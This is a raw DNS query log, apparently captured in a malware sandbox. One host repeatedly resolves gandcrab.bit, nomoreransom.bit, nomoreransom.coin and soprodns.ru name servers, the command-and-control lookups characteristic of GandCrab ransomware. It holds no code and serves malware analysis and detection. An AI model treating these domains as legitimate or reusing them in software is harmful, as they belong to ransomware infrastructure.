Aug 31, 2022 23:49:32.319798946 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:32.344158888 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:32.366090059 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:35.170795918 CEST	192.168.2.7	8.8.8.8	0xff42	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:35.292376995 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:35.365431070 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:35.450532913 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:35.533596992 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:35.553153992 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:40.191965103 CEST	192.168.2.7	8.8.8.8	0x6fa1	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:41.208512068 CEST	192.168.2.7	8.8.8.8	0x6fa1	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:41.362494946 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:41.382796049 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:41.401937962 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:41.420692921 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:41.441375971 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:43.427385092 CEST	192.168.2.7	8.8.8.8	0x174	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:44.012053967 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:44.032896042 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:44.051137924 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:44.071934938 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:44.095608950 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:45.971837044 CEST	192.168.2.7	8.8.8.8	0xa5fe	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:47.004626036 CEST	192.168.2.7	8.8.8.8	0xa5fe	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:47.139636993 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:47.157448053 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:47.175607920 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:47.194216967 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:47.214941025 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:49.229926109 CEST	192.168.2.7	8.8.8.8	0xb1d1	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:49.510601044 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:49.533186913 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:49.552383900 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:49.573700905 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:49.595768929 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:51.551908016 CEST	192.168.2.7	8.8.8.8	0x8ef7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:52.563982010 CEST	192.168.2.7	8.8.8.8	0x8ef7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:52.762547016 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:52.783907890 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:52.807468891 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:52.826347113 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:52.867185116 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:56.650087118 CEST	192.168.2.7	8.8.8.8	0x960e	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.062505960 CEST	192.168.2.7	8.8.8.8	0x960e	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.107537985 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:59.196489096 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.216727018 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:59.234950066 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.285144091 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:01.274703979 CEST	192.168.2.7	8.8.8.8	0x6e5a	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.419277906 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:01.437741041 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.457930088 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:01.476938963 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.495297909 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:03.328814983 CEST	192.168.2.7	8.8.8.8	0xabf0	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.377331972 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:03.395466089 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.414505005 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:03.437869072 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.458729029 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:05.108340025 CEST	192.168.2.7	8.8.8.8	0x5057	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:05.702292919 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:05.722794056 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:05.744185925 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:05.762356997 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:05.782380104 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:07.031923056 CEST	192.168.2.7	8.8.8.8	0x7000	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:08.021806955 CEST	192.168.2.7	8.8.8.8	0x7000	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:08.167407990 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:08.189280033 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:08.221313000 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:08.251476049 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:08.274797916 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:09.751842022 CEST	192.168.2.7	8.8.8.8	0x5e4a	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:10.296859980 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:10.316380978 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:10.336236000 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:10.354216099 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:10.372925043 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:11.642780066 CEST	192.168.2.7	8.8.8.8	0xdda6	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:12.630454063 CEST	192.168.2.7	8.8.8.8	0xdda6	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.644061089 CEST	192.168.2.7	8.8.8.8	0xdda6	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.744646072 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:13.763932943 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.786206961 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:13.814013958 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.835822105 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:15.356404066 CEST	192.168.2.7	8.8.8.8	0x4a85	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.441741943 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:15.459965944 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.480093002 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:15.500714064 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.520885944 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:16.850531101 CEST	192.168.2.7	8.8.8.8	0xc285	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:17.434011936 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:17.451853991 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:17.469830990 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:17.488065004 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:17.513889074 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:18.887698889 CEST	192.168.2.7	8.8.8.8	0x5a96	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:18.937438965 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:18.955250978 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:18.975379944 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:18.995398998 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:19.013875008 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:20.492069006 CEST	192.168.2.7	8.8.8.8	0x654d	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:20.578113079 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:20.595863104 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:20.616091013 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:20.634430885 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:20.654583931 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:22.412148952 CEST	192.168.2.7	8.8.8.8	0xb093	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.040985107 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:23.058562994 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.078639984 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:23.096844912 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:23.114940882 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:24.405147076 CEST	192.168.2.7	8.8.8.8	0x3993	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.446861982 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:24.464561939 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.482691050 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:24.503509045 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:24.524842024 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:25.783303976 CEST	192.168.2.7	8.8.8.8	0x6f26	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:26.785877943 CEST	192.168.2.7	8.8.8.8	0x6f26	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:26.957772017 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:26.987798929 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:27.025521994 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:29.035577059 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:29.053632975 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:30.635474920 CEST	192.168.2.7	8.8.8.8	0xc2cb	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:31.817447901 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:31.838449955 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:31.909568071 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:31.927813053 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:31.949356079 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:34.855798960 CEST	192.168.2.7	8.8.8.8	0x4ac2	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:35.849972963 CEST	192.168.2.7	8.8.8.8	0x4ac2	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:36.850053072 CEST	192.168.2.7	8.8.8.8	0x4ac2	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:36.947161913 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:36.965760946 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:36.986126900 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:37.016809940 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:37.037426949 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:38.372488022 CEST	192.168.2.7	8.8.8.8	0x386b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:38.961877108 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:38.982656956 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:39.002620935 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:39.022998095 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:39.043083906 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:40.316248894 CEST	192.168.2.7	8.8.8.8	0x325b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:40.395659924 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:40.415440083 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:40.433840990 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:40.454135895 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:40.475631952 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:41.741760969 CEST	192.168.2.7	8.8.8.8	0xb5	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.824610949 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:41.844460011 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.864871025 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:41.885083914 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:41.903497934 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:43.153091908 CEST	192.168.2.7	8.8.8.8	0xaf65	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:43.728780031 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:43.746818066 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:43.766763926 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:43.786806107 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:43.804909945 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:44.889817953 CEST	192.168.2.7	8.8.8.8	0x79c7	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:45.880757093 CEST	192.168.2.7	8.8.8.8	0x79c7	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:46.613910913 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:46.635471106 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:46.658423901 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:46.682796955 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:46.705234051 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:47.795392036 CEST	192.168.2.7	8.8.8.8	0xfa2	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:47.921678066 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:47.940115929 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:47.961478949 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:47.982625961 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:48.003145933 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:49.092647076 CEST	192.168.2.7	8.8.8.8	0xe83	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:49.665900946 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:49.685766935 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:49.704097033 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:49.724236012 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:49.746964931 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:50:50.837404013 CEST	192.168.2.7	8.8.8.8	0x3be0	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:50.881997108 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
